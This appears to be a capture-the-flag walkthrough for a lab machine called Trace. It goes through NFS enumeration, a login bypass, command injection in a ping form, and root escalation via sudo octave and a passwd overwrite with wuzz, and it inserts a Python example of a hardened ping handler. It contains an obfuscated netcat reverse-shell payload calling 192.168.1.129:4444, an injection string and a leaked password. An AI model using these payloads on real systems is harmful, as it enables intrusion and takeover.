# Lab Setup

Download: Trace

NAT, IP: 192.168.1.180

# Penetration Process

# Initial Information Gathering

```
PORT      STATE SERVICE  VERSION
22/tcp    open  ssh      OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
|   256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_  256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp    open  http     Apache httpd 2.4.56 ((Debian))
|_http-server-header: Apache/2.4.56 (Debian)
|_http-title: Apache2 Debian Default Page: It works
111/tcp   open  rpcbind  2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3           2049/udp   nfs
|   100003  3           2049/udp6  nfs
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      37577/tcp   mountd
|   100005  1,2,3      45651/udp6  mountd
|   100005  1,2,3      52567/tcp6  mountd
|   100005  1,2,3      59427/udp   mountd
|   100021  1,3,4      34220/udp   nlockmgr
|   100021  1,3,4      36633/tcp   nlockmgr
|   100021  1,3,4      37475/tcp6  nlockmgr
|   100021  1,3,4      40397/udp6  nlockmgr
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
2049/tcp  open  nfs      3-4 (RPC #100003)
33623/tcp open  mountd   1-3 (RPC #100005)
34597/tcp open  mountd   1-3 (RPC #100005)
36633/tcp open  nlockmgr 1-4 (RPC #100021)
37577/tcp open  mountd   1-3 (RPC #100005)
```

There is an NFS service; check what it exports.

```
┌──(root㉿kali)-[~/Desktop]
└─# showmount -e 192.168.1.180
Export list for 192.168.1.180:
/var/www/html *
```

Mount it: mount -t nfs 192.168.1.180:/var/www/html /tmp/gddfeng -o nolock

Switch to the www-data user to access the mounted files: su -s /bin/bash www-data

Inspect the file 7828d2f51ceb3aefbd12aa383ec9d5e9/index.html and obtain the domain name staffserve.nyx.

Enumerate subdomains: gobuster vhost -u staffserve.nyx -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain , which yields the subdomain admin3.staffserve.nyx

Log in and inspect the request; POSTing the password as an array, login=admin&password[]=admin , yields a new hint: networkteste.nyx

Enumerate its subdomains: ping.networkteste.nyx ; visiting it shows the ping form is vulnerable to RCE: curl 'http://ping.networkteste.nyx/' -X POST --data-raw 'pinger=127.0.0.1%7Cid&submitt=Ping'

Reverse shell: curl 'http://ping.networkteste.nyx/' -X POST --data-raw 'pinger=127.0.0.1|bas\h -c "/usr/b?n/n[c] -e /\\b\i\n/////s\h 192.168.1.129 4444"&submitt=Ping'
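The root cause of the RCE above is a ping form that hands the pinger parameter to a shell unchanged. As an added example (not code from the Trace box), here is how a hardened handler for the same form would look: the target is allow-listed as an IP literal or hostname, and ping is run from an argv list so no shell ever parses user input. The handler name and the 400 response are hypothetical.

```python
import ipaddress
import re
import subprocess

# Hostname: dot-separated RFC 1123 labels; shell metacharacters cannot match this.
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)*"
    r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$",
    re.IGNORECASE,
)


def validate_ping_target(raw: str) -> str:
    """Return a canonical IP literal or hostname, or raise ValueError.

    Allow-listing the shape of the value (instead of blocking '|', ';', ...)
    defeats a '127.0.0.1|id' payload: the whole string must be an address or
    a hostname, so there is no room left for a second command.
    """
    value = raw.strip()
    try:
        return str(ipaddress.ip_address(value))  # IPv4 or IPv6 literal
    except ValueError:
        pass
    if _HOSTNAME_RE.match(value):
        return value.lower()
    raise ValueError(f"rejected ping target: {raw!r}")


def is_valid_ping_target(raw: str) -> bool:
    try:
        validate_ping_target(raw)
        return True
    except ValueError:
        return False


def build_ping_command(raw: str) -> list[str]:
    """argv for ping; a list passed to subprocess is never parsed by /bin/sh."""
    return ["ping", "-c", "1", "-W", "2", validate_ping_target(raw)]


def handle_ping_request(form: dict) -> tuple[int, str]:
    """Hypothetical replacement handler for the form (pinger=..., submitt=Ping)."""
    raw = form.get("pinger", "")
    if not is_valid_ping_target(raw):
        return 400, "invalid host"
    result = subprocess.run(build_ping_command(raw), capture_output=True,
                            text=True, timeout=10, check=False)
    return 200, result.stdout
```

With this handler the payload from the curl command above is rejected before any process is spawned.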

Inspect /var/www/site1/random.php and find a password: m3g4S3cuR3p4zzW0rd

```
www-data@trace:/var/www/site1$ cat /etc/passwd | grep sh$
root:x:0:0:root:/root:/bin/bash
yan:x:1000:1000:yan,,,:/home/yan:/bin/bash
nel:x:1001:1001::/home/nel:/bin/bash
```

Try su with it; it logs in as yan.

# Privilege Escalation

sudo -u nel octave --eval 'system("/bin/sh")' gives a shell as nel.

Save a copy of the passwd file and change root's password in it, then use sudo wuzz to fetch that passwd file from a web server and overwrite the passwd on the target machine. Log in with the preset password and it works.

Then su to root and the box is owned.